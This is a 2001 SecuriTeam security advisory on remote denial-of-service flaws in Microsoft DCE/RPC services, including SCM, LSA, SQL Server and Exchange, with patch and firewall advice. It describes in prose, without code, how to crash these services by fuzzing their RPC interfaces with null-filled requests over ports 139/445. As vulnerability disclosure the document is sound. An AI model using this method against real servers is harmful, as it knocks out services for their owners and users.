[NT] Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons

From: support@securiteam.com
Date: 08/01/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons
Message-Id: <20010801192656.1F0B913901@mail.der-keiler.de>
Date: Wed,  1 Aug 2001 21:26:56 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons
------------------------------------------------------------------------

SUMMARY

Many DCE/RPC services do not perform proper parameter validation, and can
be crashed by sending an improperly formatted request. This would enable
an attacker to cause a denial of service attack against the service.

The following is a detailed technical report of the vulnerability:
<A HREF="
http://www.securiteam.com/windowsntfocus/5BP0N2K4UY.html">Malformed RPC
Request Can Cause Service Failure (Exchange, SQL, Windows)

DETAILS

Affected systems:
At least the following services are known to be affected. More services
are likely to be vulnerable. For a complete list of what Microsoft has
patched, see their security bulletin mentioned below.

W2K SCM (services.exe)
NT4 SCM (services.exe)
NT4 LSA (lsass.exe)
NT4 Endpoint mapper (Rpcss.exe)
W2K Endpoint mapper (svchost.exe (fixed by ms00-066))
SQL Server 7 (sqlservr.exe)
W2K's DHCP Server
W2K's IIS Server (inetinfo.exe)
Exchange 5.5 SP3 (STORE.exe)
Exchange 5.5 SP3 (MAD.exe)
NT4 Spooler (spoolss.exe)
W2K License Srv (llssrv.exe)
NT4 License Srv (llssrv.exe)

Impact:
An unauthenticated remote attacker that can connect to the service
remotely is able to crash the server. In some cases, the service may
either restart itself, or need to be restarted by the OS.

Details:
By sending successively larger and larger requests containing nothing but
nulls to every operation on every interface supported by a DCE/RPC
service, it's often possible to find a particular request that will crash
a server. Note that it is not technically necessary to run through every
possible request to crash a given server. Each service has a particular
request (or requests) which crash it. Once the proper request has been
found by grinding through all the possibilities, only that request is
needed to crash the server.

The exact endpoints on which a server listens will vary from service to
service. Many listen on named pipes, which are accessible via TCP port 139
or (on W2K) 445. Other services, e.g. Exchange, typically listen on both
TCP and UDP ports above 1024. Those services that do not listen on named
pipes can usually be enumerated via the endpoint mapper, using rpcdump.
rpcdump comes with the NT resource kit. A free version is also available
on the RAZOR web site in the rpctools package.

If COM Internet Services has been installed and enabled, then these
attacks may be possible over port 80, as well. This is not a default
configuration, however.

Workarounds:
Use your firewall to filter as much as possible of the vulnerable
services.

Recommendations:
- Install the appropriate patches from
<http://www.securiteam.com/windowsntfocus/5BP0N2K4UY.html> Microsoft.
- Do not install unnecessary COM Internet Services.

ADDITIONAL INFORMATION

The information has been provided by <mailto:tsabin@razor.bindview.com>
Todd Sabin of BindView.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages